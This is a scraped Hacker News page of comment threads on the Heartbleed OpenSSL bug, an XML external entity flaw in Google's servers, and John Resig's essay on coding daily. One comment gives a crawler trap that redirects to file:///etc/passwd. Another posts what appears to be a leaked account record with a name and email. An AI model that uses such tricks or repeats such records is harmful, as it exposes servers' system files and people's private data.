We really need to see some of the big companies take down their services until they've fixed this and call out for every company out there to audit themselves and confirm to users that this is serious and should be checked and that no service should stay online until they've patched their systems. This should get attention beyond just techies. Business as usual is not acceptable since every day that goes by is the opportunity for someone to take advantage of this and get the keys to your service and all past traffic.

I would not be surprised if people at the NSA, GHCQ and most state security services are going into overdrive right now to get access to anything and everything that is vulnerable to this bug.

bad_user 5 days ago 0 replies      
What I find strange is that I have a VPS setup on Digital Ocean, with Ubuntu LTS + OpenSSL 1.0.1 + a manually compiled Nginx. This combination should have been vulnerable, yet my website is not reported as vulnerable by the tools I tried for detecting the vulnerability.

Maybe DigitalOcean issued a fix without me noticing? I also updated my Ubuntu packages, yet OpenSSL is still at 1.0.1.

Mizza 6 days ago 1 reply      
Has anybody seen or created a PoC for this yet?
astrange 6 days ago 1 reply      
Are people going straight to buying new domain names for every TLS bug discovered these days?
thursley 5 days ago 0 replies      
Snort IDS rules to detect abuse can be found here:http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-liv...
panzi 4 days ago 0 replies      
How feasible would it be to write things like nginx, Apache, web browsers etc. so that they can use both OpenSSL and NSS, where you could choose what to use via config switch? Then it would be easy to "fix" such a bug when it occurs. The probability that both libraries have a vulnerability at the same time is probably very low.
BrandonMarc 5 days ago 1 reply      
Tinfoil-hat time: is it interesting that within hours (?) of public disclosure of the bug, there's a domain, a logo, a full writeup, everything. The paranoid part of me says the nefarious powers-that-be want me us to use the latest version, as though that would further their goals somehow.

Common sense says I'm just being silly. I just wonder.

jeffDef 6 days ago 2 replies      
Is there a way to tell if a third-party site has patched the bug? (Upgraded to 1.0.1g) Not much point in changing your password on that site before the vulnerability is fixed.
allochthon 5 days ago 0 replies      
How is it that Google and Hotmail were not vulnerable? Were they using their own implementations of SSL? I would have figured Google would make use of OpenSSL.
zizee 5 days ago 1 reply      
Heroku is working on it, but as of 07:02 UTC (30 mins ago) they have not released a fix: https://status.heroku.com/incidents/606
abc123xyz 4 days ago 0 replies      
rapidbleed! search rapidshare for "enc"


accountid=46048788 firstname=mandeep lastname=sihag servertime=1397038309 addtime=1359871506 username=heavenlybeast directstart=1 country=IN mailflags=n language=en jsconfig= email=heavenlybeast@live.com curfiles=36 curspace=1213591844 rapids=0 billeduntil=0 nortuntil=0 maxspacegb=10 additionalspacegb=0 maxdaytrafficmb=100 additionaldaytrafficmb=0 traffictoday=20511350 accounttype=0 valid=1 payabo=0 promocode=0 promotype=0 promovaliduntil=0 maxfilesize=300000000

Kiro 5 days ago 1 reply      
A lot of doomsayers here but I'm running a service which could just as well be http. https is only there for show. Why do I need to upgrade?
donpdonp 6 days ago 1 reply      
gentoo has a flag for the TLS heartbeat, so its easy to turn off.

root# USE='-tls-heartbeat' emerge openssl

SmileyKeith 6 days ago 1 reply      
Can some people who are smarter than me give us the flags we would like to compile this with manually?
TomGullen 4 days ago 0 replies      
Any scope here for SSL companies to actually have to make good on warranties they offer here?
calvins 5 days ago 1 reply      
heartbleed.com itself is still using a vulnerable OpenSSL, according to http://filippo.io/Heartbleed/#heartbleed.com
jaseemabid 4 days ago 0 replies      
So now that NSA can steal private keys, all the logs they collected over the years can be decrypted?
oskarpearson 6 days ago 1 reply      
It seems that this is likely to impact OpenVPN too, since it uses TLS - https://openvpn.net/index.php/open-source/337-why-openvpn-us...

Using a tls-auth key may help mitigate this (especially if you use UDP) since it should stop anything reaching the TLS handshake layer. https://openvpn.net/index.php/open-source/documentation/howt...

dahjelle 5 days ago 0 replies      
In case it is useful to anyone: here's my notes on rebuilding RPMs for Fedora 18: https://gist.github.com/dahjelle/10151097
WhiteDawn 6 days ago 1 reply      
I've posted this link in a separate article but I think it is more useful here.https://wiki.mozilla.org/Security/Server_Side_TLS#Nginx_conf...

How to build openSSL statically into a source build of Nginx, just finished running this with nginx-1.4.7 and openSSL-1.0.1g and it compiled just fine. You'll have to tweak it to your environment of course.

lxgr 5 days ago 2 replies      
Android versions 4.1 and higher seem to be vulnerable (check the openssl.version file for every version in https://android.googlesource.com/platform/external/openssl.g... and compare with the vulnerable versions listed on http://heartbleed.com/).
jbailo 4 days ago 0 replies      
I used the OpenSSL library for building a SAML token parser in JBoss (java). All the front end stuff was java and OpenSSL was used for public/private key decryption and validation of SAML tokens and signatures. I'm not sure exactly what an OpenSSL "server" -- it sounds like there is a feature which you can implement (or not) in your webserver to test the SSL/TLS listener.

However, you could -- as I did -- use anything else as your interface for the web. Why would you specifically include a heartbeat for just SSL is beyond me. If a website is up and running, you'll know it with the usual methods, the https codes. You don't need a separate "heartbeat" for telling you that an internal mechanism for processing a protocol is running...do you?

wpeterson 6 days ago 1 reply      
There are open support tickets in both Heroku and AWS about the impact of this bug but no answers yet.

I hope folks will promote a warning if either platform is effected both on HackerNews and twitter.

lox 5 days ago 1 reply      
Scary what the implications of this will be for OpenVPN traffic that has been captured and stored over the past 2 years.
mikeash 6 days ago 4 replies      
I don't quite understand how this bug works. I would appreciate any input from someone knowledgeable.

It sounds like the heartbeat code is sending some data in the handshake. That data should be harmless (padding? zeroes?) but the bug results in reading off the end of an array and from whatever other data happens to be there. Someone sniffing the connection can then see those bytes fly by. If they happened to contain private info, game over.

Is that a correct read on the situation? If so, my followup questions are: 1) Why is there any extra data being sent at all beyond a simple command to "heartbeat"? 2) How much data is being leaked here and at what rate? Is it a byte every couple of hours, is it kilobytes per minute, or what?

I am particularly interested in #1, since that's the part I really don't get at the moment. I suspect the answer to #2 will be implied by the answer to #1.

digitalabyss 6 days ago 1 reply      
OK well I just updated about 40 servers. Has anyone started working with CAs to reissue SSL certificates signed with a new key? Are they willing to do the reissue for free? In particular I use RapidSSL for most things and Verisign for a few bigger clients who prefer it.
joevandyk 5 days ago 1 reply      
We use openvpn. Does that need to be updated?
betadreamer 6 days ago 1 reply      
I'm not a security guru... So what kind of attack can this cause? Does this mean https will not be secured if the site uses vulnerable OpenSSL?
borrowedtime 4 days ago 0 replies      
I haven't seen a discussion about whether this can also bypass those using 2-step verification. Does anyone here know?
markwakeford 5 days ago 1 reply      
Would you be somewhat better protected i.e. (not loosing private keys, etc) if your machine sat behind a load balancer ? The memory exposed would be that of the load balancer correct ?
bogwog 5 days ago 1 reply      
Who the hell went through the trouble of buying a domain name, building a website, and designing a logo just to talk about one bug?
alxndr 5 days ago 0 replies      
Love this

> Is there a bright side to all this?

danielweber 6 days ago 0 replies      
Mirror please?
ArloL 5 days ago 0 replies      
I believe that everyone should at least consider donating to the openssl software foundation: https://www.openssl.org/support/donations.html
jydarche 6 days ago 0 replies      
So, many certificate authorities will need to re-issue certificates?
tlrobinson 6 days ago 0 replies      
No, Bitcoin doesn't use SSL/TLS.

It could have implications for Bitcoin web services that use HTTPS, of course.

thefox 5 days ago 0 replies      
Some Facebook servers are vulnerable for the Heartbleed bug: http://pastebin.com/dmYYpx2y
Klundro 5 days ago 0 replies      
Here is an online tool to check if a site is affected by it: http://possible.lv/tools/hb/
watermarkcamera 4 days ago 0 replies      
Does linux sshd have this bug ?
samstave 5 days ago 0 replies      
They should call their team AnttiMattR

:"(Riku, Antti and Matti)

mark-r 6 days ago 3 replies      
Any chance this bug originated with the NSA? It seems like it would fall under their goal of subverting the infrastructure that keeps secrets on the internet. Of course this is exactly why such a goal is a bad idea - an unprotected internet causes widespread damage.
pearjuice 6 days ago 0 replies      
"goto fail;" doesn't seem that bad now huh.Lovely how these GNU/Linux freedom fighters were LOLling their asses off earlier, but when it happens to them they sweat themselves and cry for spoon-fed instructions to compile a software package from its sources.

- sent from my Mac

AndrewBissell 6 days ago 0 replies      
I found this video of security researchers publicly announcing the existence of the heartbleed bug: https://www.youtube.com/watch?v=7CkTYPnJS0E&list=PL0ECC73C46...
How we got read access on Googles production servers detectify.com
1085 points by detectify  2 days ago   192 comments top 25
mixmax 2 days ago 5 replies      
In large production environments it's almost impossible to avoid bugs - and some of them are going to be nasty. What sets great and security conscious companies apart from the rest is how they deal with them.

This is an examplary response from google. They respond promptly (with humor no less) and thank the guys that found the bug. Then they proceeded to pay out a bounty of $10.000.

Well done google.

numair 2 days ago 6 replies      
... And this is why you want to discontinue products and services your engineers can't be motivated to maintain. Amazing.

This should scare anyone who has ever left an old side project running; I could see a lot of companies doing a product/service portfolio review based on this as a case study.

msantos 2 days ago 0 replies      
A few webcrawlers[1] out there follow HTTP redirect headers and ignore the change in schemas (this method is different of OP's but achieves the same goal).

So anyone can create a trap link such as

    <a href="file:///etc/passwd">gold</a>

   <a href="trap.html">trap</a> 
once trap.html is requested the server issues a header "Location: file:///etc/passwd"

Then it's just a matter of seat and wait for the result to show up wherever that spider shows its indexed results.

[1] https://github.com/scrapy/scrapy/issues/457

raverbashing 2 days ago 5 replies      
This is another reason not to use XML, plain and simple

It's too much hidden power in the hands of those who don't know what they're doing (loading external entities pointed in an XML automatically? what kind of joke is that?)

chmars 2 days ago 3 replies      
The guys behind this report have an interesting pricing model: Pay what you want!


The pricing models has apparently worked so far. Are any active users of Detectify here and can share their experience?

cheald 2 days ago 1 reply      
XML legitimately scares me. The number of scary, twisted things it can do make me shudder every time I write code to parse some XML from anywhere - it just feels like a giant timebomb waiting to happen.
halflings 2 days ago 1 reply      
I hope it doesn't get unnoticed that the guys who discovered this vulnerability created a really great product, Detectify :


They also discovered vulnerabilities in many big websites (dropbox, facebook, mega, ...). Their blog also has many great write-ups : http://blog.detectify.com/

njharman 2 days ago 0 replies      
take away: XML should not be used (at least as user input). It is too powerful, too big. It is much too hard and expensive to test and validate.

Input from potentially malicious users should be in the simplest, least powerful of formats. No logic, no programability, strictly data.

I'm putting "using XML for user input" in same bucket as "rolling your own crypto/security system". That is you're gonna do it wrong, so don't do it.

raesene3 2 days ago 3 replies      
Interesting to see this hit big companies like google. The problem, I think, stems from the idea that most people treat XML parsers as a "black box" and don't enquire too closely as to all the functionality that they support.

Reading the spec. which led to the implementations, can often reveal interesting things, like support for external entities..

NicoJuicy 2 days ago 0 replies      
Offtopic: the reply was generated with Google's internal meme generator, i read about it here : https://plus.google.com/+ColinMcMillen/posts/D7gfxe4bU7o

Actually digged it when i read it a few years ago and awesome knowing that it was probably used for this reply :)

dantiberian 2 days ago 1 reply      
Very cool hack. Is $10,000 around the top end of what Google will pay out? This seems like quite a serious bug as far as they go.
NicoJuicy 2 days ago 0 replies      
A job well done. This is actually impressive and quite interesting to see after what you are searching for (afterwards it seems logical :))
plq 2 days ago 0 replies      
For those who'd like to know more about xml-related attack vectors, here's a nice summary: https://pypi.python.org/pypi/defusedxml
enscr 2 days ago 4 replies      
Is there a startup that can help automate custom attacks on websites? Like guide the webmaster to look for holes in their setup. I'm guessing some security expert can do a good job educating new businesses on how to prepare for the big bad world.
mwcampbell 1 day ago 0 replies      
I'm surprised nobody has mentioned containers, e.g. Docker, as a way of limiting the damage from this kind of bug. In a container whose only purpose is to run the application, /etc/passwd should be as uninteresting as:

    root:x:0:0:root:/:/bin/sh    bin:x:1:1:bin:/dev/null:/sbin/nologin    nobody:x:99:99:nobody:/dev/null:/sbin/nologin    app:x:100:100:app:/app:/bin/sh

peterkelly 2 days ago 1 reply      
I never understood why internal or external entities were included in XML. Can anyone explain what useful purpose they serve?
kirab 2 days ago 1 reply      
I think they couldnt read /etc/shadow, so its not that bad at first. But then they could surely access some configuration file of the application itself, probably containing DB creds and of course more information which helps to find more vulns.
ajsharp 2 days ago 0 replies      
Cheers to google for properly compensating these guys for their findings.
antocv 2 days ago 4 replies      
So, when you have read access to googles prod servers, what else would be fun to do besides reading /etc/passwd ?

Getting the source?

yummybear 2 days ago 0 replies      
You should be aware that pixilating or blurring screenshots are likely not sufficient to ensure that the contents are unrecoverable.
h1ccup 2 days ago 0 replies      
Well done. I had to deal with some similar issues with my own project, and they weren't legacy code either. This should push me to go through some of my code again.
pearjuice 2 days ago 0 replies      
That must have been be a nasty call from Sergey to NSA head quarters earlier this week.

"Sir, I am sorry to inform you that another backdoor has been found. We will introduce two more as agreed upon in our service level agreement."

sebban_ 2 days ago 0 replies      
Awesome work! The bounty is a bit low though.
blueskin_ 2 days ago 0 replies      
I wonder how many of the blurred entries were NSA.
4ad 2 days ago 20 replies      
Just $10k?

This sells for at least 10 times more on the black market. Why would one rationally chose to "sell" this to google instead of the black market.

Some people don't break the law because they are afraid to get caught, but I like to believe that most people don't break the law because of the moral aspect. To me at least, selling this on the black market poses no moral questions, so, leaving aside "I'm afraid to get caught", why would one not sell this on the black market? Simple economic analysis.

Very serious question.

Write Code Every Day ejohn.org
942 points by slig  3 days ago   213 comments top 66
munificent 3 days ago 19 replies      
I am a total convert to the "don't break the chain" idea. I started writing a book on game programming[1] about four years ago. At the time, I was working at EA, miserable, and highly motivated to have the book done so it could help pad my resume. I got a book deal (O'Reilly) then, when that fell through, another (Apress). I had a real writing schedule, and a very supportive wife, and I would work on it for hours at a time.

Then I left the game industry, moved across the country, and had another kid. Suddenly, motivation and time were scarce. I backed out of the book deal and basically put it on hiatus for two years. I still really wanted to finish it but it just wasn't happening.

About a year ago, I realized that if I didn't finish it soon, I never would. My familiarity with the domain was fading every day. I didn't want the project to be a failure, so I decided to try writing every day.

I didn't have a set goal each day, but I try to do around 30-45 minutes. That ends up being ~500 words of first draft, ~1,000 words of later revisions.

In the past 309 days, I've finished 12 chapters. That's 59,568 words, plus a few thousand more for intro sections. I've redesigned the site twice, set up a mailing list, gotten a business license, and a bunch of other grunt work.

I'm about halfway through the very last chapter now (!). In less than a month, I should be able to say the book is done. (Though what I mean is that the manuscript is done, I'll be doing ebook and print versions after that.)

I absolutely could not have done this without working on it every day.

    [1]: http://gameprogrammingpatterns.com/

hawkharris 3 days ago 5 replies      
Telling a programmer to write code every day is a bit like asking an aspiring carpenter to swing a hammer: it's a necessary component of improving your skills and building things, but it is also a narrow, technical task that has limited value in isolation.

Having said that, programmers should spend at least as much time reading and thinking about code as they do writing it. You can write code for hours each day and do nothing but revert to the technologies and techniques that you find most comfortable.

tibbon 3 days ago 2 replies      
I was onboard with this school of thought for a while, right now it isn't my flow.

I work hard as-is teaching WDI at GA. I commit code frequently, but I also really want to focus more on work-life balance at the expense of getting more done. This summer, I'm taking two months off to do Burning Man and travel the country via motorcycle. During that time I expect no code to be committed. Do I feel bad about that at all? Not in the least bit, in fact I'm super excited to do it.

Currently, I try to not do much work on weekends. I like working hard during the week and then stepping away from the computer. I'll go and play music, ride my motorcycle, hang out with friends, travel, etc. The more time spent on my laptop on weekends feels like I'm missing out on things that matter strongly to me right now.

Now I am nowhere near the prolific coder that John is, and nowhere near his skill. I don't think he's wrong for doing it this way, but it isn't right for me and I'm glad that its producing results for him. I also go through periods of wanting to code daily, and other times where I'm ok with not coding for several days at a time.

To each their own. Also, Hi John!!! I haven't seen you since betahouse or you holding a Jelly at your place in Cambridge.

kyro 3 days ago 0 replies      
Do everything you want to excel at everyday.

One big problem I've learned with not working consistently at any one task is that after dropping and returning to a project, I find myself being familiar enough with areas I last touched that I want to speed through them to reach a point where I begin working on new ideas and concepts. But in most cases, those areas I left off at were the very reasons I jumped ship, either because they were too difficult or mind-numbing to wade through, leaving them incomplete/unlearned, and resulting in me having to take a few steps back to fully refresh myself before I can continue building, which leads to a lot of frustration and feeling like I'm wasting a ton of time.

gdubs 3 days ago 9 replies      
This "don't break the chain" approach has worked extremely well for me, particularly during busy periods of high stress. I first learned about it in my college writing classes, where you're supposed to write something, anything, meaningless jibberish even, every single morning. Recently I read about Seinfeld using this approach to great successs. Every day he works on material, and puts a big, fat, "X" on the calendar.
Lambdanaut 3 days ago 4 replies      
That was a beautiful post.

Currently I'm in the complete opposite modus operandi. I don't do a lick of side-project work during the week, and on weekends I take a modafinil(wakefullness promoting medication) and stay up nights on end to crack out as much as I can.

I get an INSANE amount done on the weekends that I have the energy to pull this off, but it's horrible for my health. The rest of the week I have anxiety about the coming weekend, and it completely throws of my circadian rhythm. Not to mention that I'm only able to pull this off perhaps once or twice a month.

I'll definitely be changing my work schedule to be more in-line with a daily habit. Being able to look back and see a lot of consistent work being done sounds way preferable to being able to look back at a few weekends of consistent insanity.

iSnow 3 days ago 2 replies      
In the long run, this is unhealthy.

Yes, it makes you more productive, but what if you fall in love, get sick, have a child...? Then you feel guilty about not catering to your side projects and guilt breeds procrastination.

I learned how to break down work into small pieces and rather finish one small piece and then call it a day instead of leaving something half-working for the next day. Because of this, I left projects dormant for 3 months and then picked them up again.

Granted, my side-projects are for-fun and not for-money, that makes it easier...

LanceH 3 days ago 0 replies      
Zero days are great. Enjoy them without guilt. Don't fear going back to day 1. Make your decision each day if you're going to enjoy a zero day or get something done and long streaks can follow.
beat 3 days ago 2 replies      
On a slightly related note, I'm trying to impose a new behaviorist training on myself. I've never been one to listen to music when working, although I love music (as in member of two active bands, produced many albums love music).

So now, I'm trying to do work in album-length increments. Put on the headphones, pick an album, and work on one task all the way through it. No breaks, no interruptions. It's kind of a Pomodoro technique variant, a bit longer and with the headphones involved for extra habit and insulation from the outside world.

antonius 3 days ago 1 reply      
"No more zero days" is a good quote to live by. No matter how busy I get, I try to code something everyday.
chris_va 3 days ago 1 reply      
I just want to caution folks, from experience, that it is easy to miss the forest for the trees if you are constantly trying to code.

I think the key takeaway here is that sticking to a plan is helpful, and that a coding heavy plan is a productive one. This is a great post for that.

I would argue that a good plan should include time off for reflection, and to avoid burning out. I have seen too many engineers burn out because they were convinced that working constantly was optimal for progress.

tieTYT 3 days ago 0 replies      
This is a good article. I believe this idea comes from Jerry Seinfeld^1.

Here's an article that really complements the submission: http://start.jcolemorrison.com/how-i-fight-procrastination/ It's titled "How I fight Procrastination" and gives advice on how to break up tasks into day-sized activities.

Finally, I want to say I personally disagree with the OP's 2nd point:

    2. It must be useful code. No tweaking indentation, no code     re-formatting, and if at all possible no refactoring.     (All these things are permitted, but not as the exclusive work of the day.)
I've noticed that when I'm really tired or "not feelin' it" sometimes I just want to do something that takes 10 minutes so I can keep the chain going. When I spend a day (ie: 10 minutes) refactoring some code, I don't lose my motivation to work on my project tomorrow. It's breaking the chain makes me lose motivation and if I forced myself to write something "useful" on a day I don't feel like it, I may just end up breaking the chain instead. It's of the utmost priority to lower the bar to work on your project and rule 2 is an obstacle to that. Plus, I take mild offense to the idea that refactoring is not considered useful :)

And, if I had this rule I think I'd avoid refactoring a lot of code that needs it. I'd spend more effort squeezing that square feature into that round hole if refactoring "didn't count".

    ^1: http://lifehacker.com/281626/jerry-seinfelds-productivity-secret

balou 2 days ago 1 reply      
Really? I'm so surprised to see so many "Awesome! Go for it" answers to this.

While I admire the dedication and focus it takes to stay up to such routine, I am certainly concerned by the quality of life and the narrow mindedness of enforcing upon oneself to code on a daily basis. What about days off? Going out friends / family for a weekend or holidays? One would suggest to bring your laptop so you can stick to it? This is madness to me...

I love to code, contribute to OS projects, do code for a leaving and for myself - but for nothing in the world I'd even attempt such thing.

Setting yourself with goals is great and required to some extend but on a proper schedule. Going to the gym 3 times a week can be achieved without being complexed by the fact you didn't go there every single day - and yet you can substantially improve yourself. I don't envy those buffy dudes that stick to it.

I'll stick to enjoying evenings with my wife, do code maybe 1 or 2 times during the week days, spend an extra day on more complex issues on the week end, and rest for the last day. Just saying.

Sindrome 3 days ago 2 replies      
Why is it so noble and healthy to be a workaholic if you are a Software Engineer?
zachlatta 3 days ago 0 replies      
Great post! A similar approach has been working really well for me. I'm on target to hit a year of consecutive days of coding this weekend. GitHub: https://github.com/zachlatta

I had a bit lower baseline than the author. My rules are as follows:

1. Commit something, anything. Even if it's just fixing a typo in a readme or phrasing some documentation better.

2. You must commit every day.

3. Every contribution must be useful.

redmaverick 3 days ago 0 replies      
This essay[1] made a deep impression on me and I rationalize not working if I don't have a long chunk of time available to work on my side projects.


Will need to change my attitude and get more done. Good piece.

gbhn 3 days ago 1 reply      
I'm curious if 30 minutes is the lower bound on meaningful project time if the constraint of writing code is lifted. I've been thinking about what kinds of projects could be decomposed into 20 minute work units, allowing some work units to basically be all thinking (design, specs, figuring out how to split up a problem, etc.) and others to be more coding.

I'm suspicious that there are many projects that could be decomposed like this, or even into 10 minute blocks, but that it'd be really helpful to have tools that makes this more achievable -- ones that basically remind you of where you were and help with the what-do-I-do-next decision.

Does anyone have any experience with this kind of development process?

zhemao 2 days ago 0 replies      
While Resig's dedication is admirable, I'd caution against applying his advice too broadly. He is doing it because he has side projects that he wants to complete. There's no reason to force yourself to code every day for coding's sake.

I've been doing a lot of side-project hacking the past three months, as evidenced by my Github activity graph (https://github.com/zhemao), which, admittedly, is not as impressive as Resig's. However, this week, I finished up my latest side project and found myself at a loss for new ideas. At first, I did feel a bit guilty about not doing any coding, since it had been a long time since I had nothing to work on. But then I realized that there's more to productivity than a nice contribution graph and sometimes it's good to take a step back in order to think, reflect, and get inspiration.

I'm currently reading through Patterson and Hennessy's "Computer Organization and Design" to learn more about computer architecture. I'd also like to practice my saxophone some more, start learning how to draw, help a friend who is still in college find a job, and expand my social life a bit. My Github account will still be there when I am ready to get back into it.

nicholassmith 2 days ago 0 replies      
I love coding, but the idea of doing it every day would make me hate it so quickly. I love learning new technologies when I want too, or fiddling with a concept, but I want it to be because I want to do it and not because I feel obligated too. I've put myself in that situation before and all it did was bum me out and push me close to a burnout situation, it works for some people sure but people should be doing things because they enjoy it.

Don't write code every day, do something you want to everyday.

mdoerneman 3 days ago 0 replies      
It's crazy that I found this today...I just started something similar except instead of coding every day I set a goal of 4 hours per week and I use Beeminder to track my progress. Many of the benefits you listed are spot on especially "the feeling of making progress is just as important as making actual progress." Now that I have children, coding for 8 hours on a Saturday just doesn't work. To reach my current goal of 4 hours per week, I plan on coding for 30 minutes in the morning or night where I can but I also have arranged with my wife one weeknight where I leave the house and go code at a coffee shop for 2-3 hours.
josephschmoe 3 days ago 0 replies      
Don't focus on the how. You can produce good code by:1. Coding every day2. Hackathons3. Coding on certain days4. However you want.

What matters though, is how -you- work. Are you the sort of person who prefers to code as much as possible? Code every day. Do you enjoy getting a big thing done fast? Hackathons are for you. Do you have children, a life or a job? You might want to code whenever you can instead of trying to force yourself into something that might not work for you.

darkFunction 3 days ago 1 reply      
Absolutely this. You can also use a tool like Gitstats (if you don't use Github) to track your progress. A lot of my code is written inside thirty minutes on the bus and tube on the way to work. Sometimes you might feel like there's no point even pulling the laptop out of your bag since the time window is too small- but every time you will surprise yourself with how much you manage to get done.

The best thing about the 'little and often' approach is how you get drawn into fixing something big just by starting to fix something small. Getting into The Zone for hours at a time is great and everything but honestly I'm starting to view the whole process as just clocking in keystrokes.

My gitstats (http://notes.darkfunction.com/gitstats/index.html) is showing commits on 56 of 85 days. A week of the remainder I was on holiday, and I tend to rebase quite a lot so actual days committed should be higher. But in that time I have written over 18,000 lines of code and removed over 6000. Almost a full iPhone application since January in my spare time, now onto the home stretch and couldn't be more pleased with the results.

coolsunglasses 3 days ago 1 reply      
This doesn't improve you much unless you're really new or skilled at challenging at yourself and finding new things to learn.

If the latter is true, do you really need advice?

Said differently: flow is the opiate of the masses.

steveklabnik 3 days ago 2 replies      
The real problem with "don't break the chain" is that once it does, things collapse.

See my graph: https://github.com/steveklabnik

As you can see, I'm about to lose a ton of green. I'm at 87 days as my longest, but July 6, 2013 was brutal for me. I was actually flying, and had saved a small bit of work to do during a layover, but then I totally forgot.

Once that chain was broken, it was super easy to justify taking some time off...

chewxy 3 days ago 0 replies      
As much as I like this idea, I do wish John talked more about HOW he did it. "No More Zero Days" is a good thing as a target, but it's often unachievable.

For me at least, the context switch required between what pg calls the manager's schedule and maker's schedule is so huge that it takes hours to cross that gulf (that's what I'm mostly switching between anyway)

Do you just sit down and force yourself to hammer out code?

karangoeluw 3 days ago 1 reply      
Inspirational post.

Last year, I [1] set a goal to teach myself git by committing at least once every day for a month. At the end of this, I saw the streak, and was too afraid to see it go down to 1 in a snap. Ever since, I've been committing code daily, and it's been about 40 weeks, and I'm still going strong. Being a full time student, this wasn't really easy for me, but I'm proud of myself.

The one thing I learned is, that the problem isn't the lack of ideas or time, but the lack of motivation to work on them.

[1] https://github.com/karan

thewarrior 2 days ago 0 replies      
I decided I would write a short story everyday. Ended up forcing myself to write random gibberish for a few days before i gave up.
endlessvoid94 2 days ago 0 replies      
Related: for the first time in my 15-year programming career, I've spent the past year or so doing more engineering management than actual coding, and it has noticeably improved my programming ability.
Cthulhu_ 2 days ago 0 replies      
I'm guessing this doesn't apply to the average developer; after all, we write code for a living. I sure do. I don't usually do any coding when not on the clock, after all, I've already done 8ish hours of work by then (and if I'm lucky, most of it spent coding).
prezjordan 3 days ago 1 reply      
I tried this a few months ago and failed miserably: https://medium.com/lessons-learned/ab219377be93

Really enjoyed your post, though. I think I might give it another shot from a different perspective.

ScottyE 1 day ago 0 replies      
Jeff Haden refers to this mindset as a systems-oriented mindset as opposed to a goals-oriented mindset. He's written a great article about it here: http://www.inc.com/jeff-haden/an-nearly-foolproof-way-to-ach...
danso 3 days ago 0 replies      
I know for some people, TDD is the kind of friction-causing mechanism that kills the desire for everyday coding...but I've found it extremely helpful, even for small personal projects.

On nights when I absolutely cannot write a piece of working code, I scaffold out the tests. When I wake up the next morning and have 5 minutes with my coffee, I pass a test. Not much gets done, but by building the habit and ability to "jump into coding", no matter the time, place, or circumstance...that's how I've been able to build the coding-zen-mentality needed to write "real" code when the time comes.

Bahamut 3 days ago 0 replies      
I don't write code every day, but that is largely due to my military obligations as a reservist. Other than that, I often work on various side-projects and/or help others with their coding woes as a way to learn & help keep sharp. I'm disciplined enough to learn what I need to on my own time whenever I want.

Sometimes I burn out, and in those instances I take my free time away from programming.

The most important take away is to figure out how you want to improve yourself, instill passion in doing so, then executing.

slowblood 1 day ago 0 replies      
I've made it a point to NOT check things in on Sundays. I break my own rule. I get the OCD gimmick to get yourself motivated but ...

I flies against of my philosophy of coding. Less is more, quality over lines of code. Not coding for coding sake. And coding on paper and writing out data structures and algorithms.

Hey, if a whole bunch connected green dots gives you a feeling of accomplishment. Enjoy!

ethanhunt_ 3 days ago 0 replies      
"An interesting side effect of writing side project code every day is that your current task is frequently running in the back of your mind. Thus when I go for a walk, or take a shower, or any of the other non-brain-using activities I participate in, Im thinking about what Im going to be coding later and finding a good way to solve that problem."

Is that not a negative? I find it hard to stop thinking about what I'm working on, and it negatively impacts my life. I leave the office after 8 hours, but the next 2 hours are spent turning over problems in my head, and the 2 hours before I sleep are spent on it too. The days that I work on a problem at the office for a few hours and can't unblock myself before leaving are hell. My brain won't turn off until I can get into work the next day and begin on the problem. Some days I will even wake up in the morning or night with answers to the problem. Why is the AWS instance in my head turned on all night long when I'm not even getting paid for it?

paisible 3 days ago 0 replies      
2 years ago some friends and I started writing one song each per week (and met every Thursday to listen to our respective master-pieces). We mostly ended up composing and recording the songs on iphones the Wednesday night before (thank god for GarageBand), and after 3-4 weeks were producing more creative content in this compressed timeframe than we'd had been able to with no deadline before. A few months in we skipped a Thursday or two, and suggested the solution was to write one song per month instead. That was definitely not the solution. We didn't find more time to write, and the lack of schedule killed the momentum. My biggest regret of the last year is not sticking to it - however a friend just moved to our city with the condition that we'd get it started again with the weekly frequency, so I'm optimistic :)
moron4hire 3 days ago 0 replies      
I have the opposite problem. I need to code less per day and work on the other important things in my life.
rajlal 3 days ago 0 replies      
Great blog post john,

I had this experience when i was working on a book and i had to spend considerable amount of time every week on one example. The book had 100 examples so it took me two years to complete the book but the experience was amazingly satisfying because i was able to justify the effort, going slow and steady.

The other thing i noticed is the increase in quality when you do less but give more time to think. Keeping the problem in your mind create innovative solutions. Which is impossible if you want to just hack up everything one weekend.

My personal favorite is keeping a point system for all the good things you want to do in your day and add them up for weeks and at the end of the month, check the total and see where are you lacking behind. What percentage of life you are actual able to live the way you want. Haven't got to 100% yet but above 60% i give a pat in the back.

beat 3 days ago 0 replies      
I really needed to read this, today. Thank you.
patrickford 3 days ago 0 replies      
I recently started the same discipline. I spent a good part of my career writing code then worked my way up to executive management and stopped. After several years as Director of this, or VP of that, my skills had eroded. Late last year I decided to take a sabbatical and get back into the game by applying to Hack Reactor in SF. It was an intense period of two months of pre-course work (18 Code School classes and a bunch of coding assignments), followed by three months of intense work on site where we went 11+ hours a day for 6 days a week. One of the disciplines there is to work on a short toy problem every morning for 30-60 minutes. Although I finished the program recently I am keeping up that practice as well as working on my real project, a new startup for social video. Ill never stop coding again!
mburst 3 days ago 1 reply      
I totally agree with this. About a month ago I created a site that puts up a new programming or logic puzzle every day Monday-Friday. The exercises usually take no more than 30min and the community has been steadily growing. If you're interested you can check it out at http://problemotd.com/
jhtan 2 days ago 0 replies      
I'm actually testing this strategy for competitive programming. Was very difficult to train for the ACM-ICPC when I was working as developer, but now that I only study in the University I solve at least a problem a day for maintain my streak in my Github in these are the results in some online judges for competitive competitions:http://community.topcoder.com/tc?module=MemberProfile&cr=227...http://codeforces.com/profile/jhtanIt works!..
legierski 2 days ago 0 replies      
This reminds me my 'Half hour' productivity hack that I've been testing last year: http://blog.self.li/post/34104114881/4-weeks-into-half-hour-...
Fenicio 2 days ago 0 replies      
Very inspiring, but take into account that John (most likely) lives in a good enviroment to proceed with this, his job is intellectually demanding but he is not overworked or extramulti-tasked.

If your job leaves you depleted, and when you arrive home you're like a husk of a human being you can't expect to do something like this.

Take into account that great developers like John live in a place where they can grow, you can't copy what they do and expect to have the same great results in a not so great environment.

jes5199 3 days ago 3 replies      
Is your side project really this important to you? It's your source of identity and self-worth?

I say: take three months off from even touching a text editor and practice guitar every day.

I think my system leads to happier, healthier human beings.

da02 3 days ago 0 replies      
I tried to do this, but in the end I ended up getting a job at a fast food place (part time). It uses different parts of my brain (as opposed to freelancing), and forces me to stick to the schedule. I can't exactly explain it, but it really gave me a BIG productivity boost.
jsutton 3 days ago 0 replies      
